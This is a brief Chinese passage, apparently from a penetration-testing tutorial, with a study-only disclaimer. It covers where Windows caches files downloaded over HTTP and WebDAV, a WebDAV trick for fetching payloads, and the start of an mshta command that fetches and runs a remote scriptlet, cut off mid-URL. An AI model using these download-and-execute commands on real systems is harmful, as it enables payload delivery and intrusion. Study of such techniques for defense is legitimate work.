声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。
取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。
Mshta下载&执行
mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下:
mshta vbscript:Close(Execute("GetObject(""script:https: